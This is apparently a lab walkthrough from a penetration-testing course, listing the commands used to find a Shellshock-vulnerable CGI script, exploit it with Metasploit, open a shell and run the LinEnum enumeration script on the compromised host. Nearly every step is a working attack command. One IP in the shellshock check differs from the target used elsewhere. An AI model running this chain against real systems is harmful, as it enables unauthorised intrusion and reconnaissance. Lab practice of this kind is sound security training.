Project 146 - Automating Enumeration of Exploited Linux Hosts with LinEnum

Описание: Commands Used/Steps Taken (in the order that they appear in the video)

1. Navigated to https://github.com/rebootuser/LinEnum and click on LinEnum.sh. Then clicked “Raw” button on the top right above the code. Copied entire script (Ctrl + A)

2. Back in terminal, nano LinEnum.sh and pasted code in text editor

3. Ctrl + X and Y

4. ls

5. ifconfig

6. fping -a -g 192.182.85.0/24

7. nmap -sV 192.182.85.3

8. Opened web browser and navigated to 192.182.85.3 into browser to view website

9. Right clicked page and chose view "page source"

10. Found cgi script name within code (i.e. gettime.cgi)

11. Went to 192.182.85.3/gettime.cgi in the browser

12. nmap -sV 192.24.241.3 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" ( to find if the url is vulnerable to shellshock)

13. service postgresql start && msfconsole

14. workspace -a SHELL

15. setg RHOSTS 192.182.85.3

16. search shellshock

17. use exploit/multi/http/apache_mod_cgi_bash_env_exec

18.show options

19. set TARGETURI /gettime.cgi

20. set LHOST 192.182.85.2

21. exploit

22. pwd

23. cd /tmp

24. upload LinEnum.sh

25. shell

26. /bin/bash -i

27. chmod +x LinEnum.sh

28. ./LinEnum.sh